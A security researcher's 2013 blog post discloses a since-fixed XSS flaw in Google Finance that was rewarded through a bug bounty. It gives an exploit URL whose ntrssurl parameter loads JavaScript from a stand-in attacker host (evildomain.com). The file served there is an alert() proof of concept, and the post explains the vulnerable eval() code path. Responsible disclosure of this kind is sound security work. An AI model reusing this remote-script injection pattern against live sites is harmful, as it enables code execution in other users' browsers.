XSS in Google Finance

July 30, 2013

Here I present a XSS vulnerability I discovered in google.com, requiring no user interaction.

It is due to a glitch in Google Finance, which is hosted on google.com/finance, that allows to trick the Javascript application for plotting charts (in particular, source file /finance/f/sfe-opt.js) to load a file hosted on an external domain and eval() its content as Javascript code.

This exploit does not require any user interaction, it’s just a matter of clicking on a URL.

Steps to reproduce:

  1. Just click on this URL (now fixed): https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js.

    File x.js contains the following proof-of-concept code for demonstration purposes:

    alert(document.domain);
    

    The file must be hosted over HTTPS.

  2. The remote Javascript is executed.

How does it work?

Here are two (obfuscated) code snippets of /finance/f/sfe-opt.js responsible for this vulnerability:

c.push("ntsp=");
c.push(b);
if (b == Vl.jj || b == Vl.kj)
  (a = a.xc[ii(a.S)]),
    a.lj() || (c.push("&ntrssurl="), c.push(escape(a.Cc || "")));
return c.join("");

In this first snippet, URL parameters, and in particular the ntrssurl parameter (address of a custom RSS feed) are fetched and concatenated.

Xi.prototype.send = function (a, b, c, d) {
  a = a || null;
  d = d || "_" + (Yi++).toString(36) + x().toString(36);
  n._callbacks_ || (n._callbacks_ = {});
  var e = this.$s.Z();
  if (a)
    for (var f in a)
      (a.hasOwnProperty && !a.hasOwnProperty(f)) || Fi(e, f, a[f]);
  b && ((n._callbacks_[d] = Zi(d, b)), Fi(e, this.Zs, "_callbacks_." + d));
  b = Wi(e.toString(), {
    timeout: this.We,
    Ns: !0,
  });
  Si(b, null, $i(d, a, c), void 0);
  return {
    La: d,
    Du: b,
  };
};

This part of the code is responsible for querying an external domain for a newsfeed to be displayed on the plot as an overlay.

It generates a base-36 callback function name, and the function Wi performs an xmlhttprequest to the domain supplied in the ntrssurl parameter in the URL, appending ?_CALLBACK_.

In this case, a simple Javascript code is returned and eval()‘ed.

Screenshots

Screenshot of the XSS vulnerability triggered Screenshot of the callback request Snippet of the vulnerable Javascript code

This vulnerability was fixed in a matter of days, and I received a $5k reward.

Thank you, Google Security Team! :)

XSRF and Cookie manipulation on google.com

Stored XSS in GMail